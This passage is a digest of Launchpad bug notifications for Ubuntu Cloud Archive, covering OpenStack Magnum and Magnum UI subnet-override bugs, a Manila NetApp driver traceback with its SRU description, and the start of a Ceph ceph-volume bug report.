ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2069125 at bugs.launchpad.net Thu Aug 1 15:41:00 2024 From: 2069125 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 15:41:00 -0000 Subject: [Bug 2069125] Fix included in openstack/manila 16.2.1 References: <171818195903.325609.11857475105697361395.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252686058.1752322.7399405978639685359.malone@juju-98d295-prod-launchpad-4> This issue was fixed in the openstack/manila 16.2.1 release. ** Changed in: cloud-archive/antelope Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2069125 Title: [SRU] Manila driver error with ONTAP SVM-scoped user Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: New Status in Ubuntu Cloud Archive caracal series: New Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Shared File Systems Service (Manila): Fix Released Status in manila package in Ubuntu: New Status in manila source package in Jammy: New Status in manila source package in Mantic: Won't Fix Status in manila source package in Noble: New Bug description: ************** SRU DESCRIPTION AT THE BOTTOM ************* With the same NetApp stanza in the manila.conf file which was used without any issue in the Zed release was used in the Bobcat release. In the Bobcat release, the share creation worked normally, but adding access rule was not worked and couldn't delete the share. Below is the error log that occurs when adding a rule. I set all the roles indicated in NetApp's OpenStack operation guide in storage side(https://netapp-openstack-dev.github.io/openstack-docs/bobcat/manila/configuration/ontap_configuration/section_ontap-config.html#ontap-prerequisites). ########### manila-share.log ############ 2024-05-27 15:43:14.708 19 INFO oslo.messaging.notification.share.create.end [None req-4b46bc06-9332-40f3-9ef0-57895519228c c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4 76a637a88d624e3ea80b261a4c66dc2a - - - -] {"message_id": "d9fcc12a-5449-437c-85a0-eb5bdddab553", "publisher_id": "share.dc1-infra-rnd-stack-ctrl-01 at c400", "event_type": "share.create.end", "priority": "INFO", "payload": {"share_id": "68e79de3-5e22-472b-a895-c79e0b677b01", "user_id": "c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4", "project_id": "76a637a88d624e3ea80b261a4c66dc2a", "snapshot_id": null, "share_group_id": null, "size": 20, "name": "asdasd", "description": null, "proto": "NFS", "is_public": true, "availability_zone": null, "host": "dc1-infra-rnd-stack-ctrl-01 at c400#N1_Data", "status": "creating", "share_type_id": "40cdd81c-1fa8-4fc6-8f5e-288d0b9f5430", "share_type": "NFS_VOLUME"}, "timestamp": "2024-05-27 06:43:14.708153"} 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server [None req-be5d1bf0-c013-47ac-94bc-2de599a3862f c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4 76a637a88d624e3ea80b261a4c66dc2a - - - -] Exception during message handling: manila.share.drivers.netapp.dataontap.client.api.NaApiError: NetApp API failed. Reason - 15661:entry doesn't exist 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server Traceback (most recent call last): 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/server.py", line 165, in _process_incoming 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server res = self.dispatcher.dispatch(message) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/dispatcher.py", line 309, in dispatch 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self._do_dispatch(endpoint, method, ctxt, args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/dispatcher.py", line 229, in _do_dispatch 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = func(ctxt, **new_args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 236, in wrapped 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/utils.py", line 481, in wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return func(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 4177, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self.update_access_for_instances(context, [share_instance_id], 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 4191, in update_access_for_instances 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self.access_helper.update_access_rules( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 299, in update_access_rules 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self._update_access_rules(context, share_instance_id, 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 336, in _update_access_rules 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server driver_rule_updates = self._update_rules_through_share_driver( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 401, in _update_rules_through_share_driver 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server driver_rule_updates = self.driver.update_access( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/cluster_mode/drv_single_svm.py", line 103, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self.library.update_access(context, share, access_rules, add_rules, 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/cluster_mode/lib_base.py", line 2355, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server helper.update_access(share, share_name, access_rules) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/base.py", line 34, in wrapped_func 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return source_func(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_concurrency/lockutils.py", line 414, in inner 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(*args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/base.py", line 32, in source_func 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/nfs_cmode.py", line 114, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server auth_methods = self._get_auth_methods() 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/nfs_cmode.py", line 221, in _get_auth_methods 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server kerberos_enabled = self._client.is_kerberos_enabled() 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/client_cmode.py", line 2042, in is_kerberos_enabled 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = self.send_request('kerberos-config-get', api_args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/client_base.py", line 89, in send_request 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self.connection.invoke_successfully( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/api.py", line 717, in invoke_successfully 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self.get_client(use_zapi=use_zapi).invoke_successfully( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/api.py", line 388, in invoke_successfully 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server raise NaApiError(code, msg) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server manila.share.drivers.netapp.dataontap.client.api.NaApiError: NetApp API failed. Reason - 15661:entry doesn't exist 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server 2024-05-27 15:44:08.487 19 INFO manila.share.manager [None req-4bfe58a9-a794-497d-8b75-7ee098ea0e11 - - - - - -] Updating share status =============== SRU DESCRIPTION =============== [Impact] The NetApp driver kerberos-config-get fails when using a SVM-scoped user because it does have not enough privileges to perform that check. This failure causes the entire stack to fail, thus preventing access rules from being added to shares. The fix addresses this by capturing the exception and not reraising it, allowing the operation to continue. [Test case] Testing around this is limited because: 1) The NetApp CI upstream is broken at this time. The fix was validated internally by contributors and NetApp driver maintainers. 2) We do not have a NetApp box in our lab to verify the SRU for this scenario. 3) Running the Manila tempest suite is useless because the change is limited in scope to the NetApp driver, that is only operational when using NetApp storage. [Regression Potential] Given that the change is limited to the NetApp driver, it is small and was peer-validated, we consider the regression potential minimal. [Other Info] None. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2069125/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:44:09 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:44:09 -0000 Subject: [Bug 2038663] Re: [SRU] no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252705056.1053747.13840698200652160383.launchpad@juju-98d295-prod-launchpad-3> ** Description changed: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] - 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet - 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. + 1. Deploy an OpenStack cloud with the magnum-ui extension installed. + ``` + git clone https://opendev.org/openstack/charm-magnum-dashboard + cd charm-magnum-dashboard + git checkout stable/${VERSION} # ${VERSION} can be 2023.1, yoga or ussuri. + tox -e build + tox -e func-target -- ${BUNDLE} # ${BUNDLE} can be jammy-antelope, jammy-yoga or focal-ussuri + ``` + + 2. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet + 3. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. + + [ Where problems could occur ] + + This is a javascript (Angular) code change, issues can be detected using + the Web Developer Tools console where a javascript exeception may be + raised. + + Another source of problems is that this code change adds a handler when + populate the list of subnets when the network is changed in the "Fixed + Network" dropdown list, if there were issues the subnet list would be + rendered empty. + + [ Other Info ] + + - This bug fix was merged during the 2024.1 (Caracal) development cycle - https://review.opendev.org/c/openstack/magnum-ui/+/898007 + - The commit that fixes this issue is available since magnum-ui-14.0.0 - https://opendev.org/openstack/magnum-ui/commit/6f6c3db282fe2f0e08ad69c557eb153858b0164a + - This bug fix is not relevant for upgrades, it's purely UI fix + - This change is adding a new UI component, which on the surface may look like not suitable for a SRU, although the current UI induces users to get into a broken configuration for new clusters when overriding the cluster template's network. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Deploy an OpenStack cloud with the magnum-ui extension installed. ``` git clone https://opendev.org/openstack/charm-magnum-dashboard cd charm-magnum-dashboard git checkout stable/${VERSION} # ${VERSION} can be 2023.1, yoga or ussuri. tox -e build tox -e func-target -- ${BUNDLE} # ${BUNDLE} can be jammy-antelope, jammy-yoga or focal-ussuri ``` 2. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 3. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. [ Where problems could occur ] This is a javascript (Angular) code change, issues can be detected using the Web Developer Tools console where a javascript exeception may be raised. Another source of problems is that this code change adds a handler when populate the list of subnets when the network is changed in the "Fixed Network" dropdown list, if there were issues the subnet list would be rendered empty. [ Other Info ] - This bug fix was merged during the 2024.1 (Caracal) development cycle - https://review.opendev.org/c/openstack/magnum-ui/+/898007 - The commit that fixes this issue is available since magnum-ui-14.0.0 - https://opendev.org/openstack/magnum-ui/commit/6f6c3db282fe2f0e08ad69c557eb153858b0164a - This bug fix is not relevant for upgrades, it's purely UI fix - This change is adding a new UI component, which on the surface may look like not suitable for a SRU, although the current UI induces users to get into a broken configuration for new clusters when overriding the cluster template's network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 15:45:52 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:45:52 -0000 Subject: [Bug 2038109] Re: Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252715355.1054752.7051891739903448902.malone@juju-98d295-prod-launchpad-3> marking Zed as won't fix, because is EOL ** Changed in: cloud-archive/zed Status: In Progress => Won't Fix -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038109 Title: Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ --image fedora-coreos-32 \ --keypair testkey \ --external-network ext_net \ --flavor m1.small \ --network-driver flannel \ --coe kubernetes \ --fixed-network admin_net \ --fixed-subnet admin_subnet 2. Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ --cluster-template k8s-cluster-template \ --timeout 120 \ --fixed-network private \ k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 16:03:40 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 16:03:40 -0000 Subject: [Bug 2038109] Re: Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252822096.954710.13378957696633071416.malone@juju-98d295-prod-launchpad-7> marking bobcat as won't fix since it's EOL ** Patch removed: "lp2038109_zed.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109/+attachment/5798100/+files/lp2038109_zed.debdiff ** Changed in: cloud-archive/bobcat Status: In Progress => Won't Fix ** Summary changed: - Failed to create port on network , because fixed_ips included invalid subnet + [SRU] Failed to create port on network , because fixed_ips included invalid subnet -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038109 Title: [SRU] Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ --image fedora-coreos-32 \ --keypair testkey \ --external-network ext_net \ --flavor m1.small \ --network-driver flannel \ --coe kubernetes \ --fixed-network admin_net \ --fixed-subnet admin_subnet 2. Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ --cluster-template k8s-cluster-template \ --timeout 120 \ --fixed-network private \ k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 16:22:20 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 16:22:20 -0000 Subject: [Bug 2038109] Re: [SRU] Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252934141.1804874.7957981065741209911.launchpad@juju-98d295-prod-launchpad-4> ** Description changed: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ - --image fedora-coreos-32 \ - --keypair testkey \ - --external-network ext_net \ - --flavor m1.small \ - --network-driver flannel \ - --coe kubernetes \ - --fixed-network admin_net \ - --fixed-subnet admin_subnet +     --image fedora-coreos-32 \ +     --keypair testkey \ +     --external-network ext_net \ +     --flavor m1.small \ +     --network-driver flannel \ +     --coe kubernetes \ +     --fixed-network admin_net \ +     --fixed-subnet admin_subnet 2. Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ - --cluster-template k8s-cluster-template \ - --timeout 120 \ - --fixed-network private \ - k8scluster +     --cluster-template k8s-cluster-template \ +     --timeout 120 \ +     --fixed-network private \ +     k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { - "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", - "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" +   "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", +   "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } + + [ Where problems could occur ] + + - This change introduces validation of the configuration passed by the + user during the creation of a new cluster, issues can be raised during + the creation of new clusters, but not for already created clusters. + + [ Other Info ] + + - The patches associated to this SRU were merged during the OpenStack 2024.1 (Caracal) devel cycle + - Patches + + https://opendev.org/openstack/magnum/commit/753baadbb8b5b4c3032d4618166b1c899a50fb07 + + https://opendev.org/openstack/magnum/commit/a8bce0bfee81218cd1c0ddcf3e2b86b96659933e -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038109 Title: [SRU] Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \     --image fedora-coreos-32 \     --keypair testkey \     --external-network ext_net \     --flavor m1.small \     --network-driver flannel \     --coe kubernetes \     --fixed-network admin_net \     --fixed-subnet admin_subnet 2. Create a new cluster using the template previously created and select an existing network openstack coe cluster create \     --cluster-template k8s-cluster-template \     --timeout 120 \     --fixed-network private \     k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' {   "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']",   "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } [ Where problems could occur ] - This change introduces validation of the configuration passed by the user during the creation of a new cluster, issues can be raised during the creation of new clusters, but not for already created clusters. [ Other Info ] - The patches associated to this SRU were merged during the OpenStack 2024.1 (Caracal) devel cycle - Patches + https://opendev.org/openstack/magnum/commit/753baadbb8b5b4c3032d4618166b1c899a50fb07 + https://opendev.org/openstack/magnum/commit/a8bce0bfee81218cd1c0ddcf3e2b86b96659933e To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2075541 at bugs.launchpad.net Thu Aug 1 16:44:16 2024 From: 2075541 at bugs.launchpad.net (macchese) Date: Thu, 01 Aug 2024 16:44:16 -0000 Subject: [Bug 2075541] [NEW] ceph-volume lvm new-db requires 'bluestore-block-db-size' parameter Message-ID: <172253065699.570435.7228977478945066046.malonedeb@juju-98d295-prod-launchpad-2> Public bug reported: when trying to add a new-db to an existing LVM OSD, ceph-volume lvm new-db fails requiring 'bluestore-block-db-size' parameter even this bug should be resolved by https://tracker.ceph.com/issues/55260 my env: root at op1:~# lsb_release -r Release: 22.04 root at op1:~# lsb_release -rd Description: Ubuntu 22.04.4 LTS Release: 22.04 ceph-volume 18.2.0-0ubuntu3~cloud0 lv db volume: root at op1:~# lvdisplay vol_db/c1 --- Logical volume --- LV Path /dev/vol_db/c1 LV Name c1 VG Name vol_db LV UUID uCv6n3-Wa0H-0DaO-GGsc-Wa4c-VLfb-7KqG7X LV Write Access read/write LV Creation host, time op1.maas, 2024-08-01 16:27:22 +0000 LV Status available # open 0 LV Size 166.00 GiB Current LE 42496 Segments 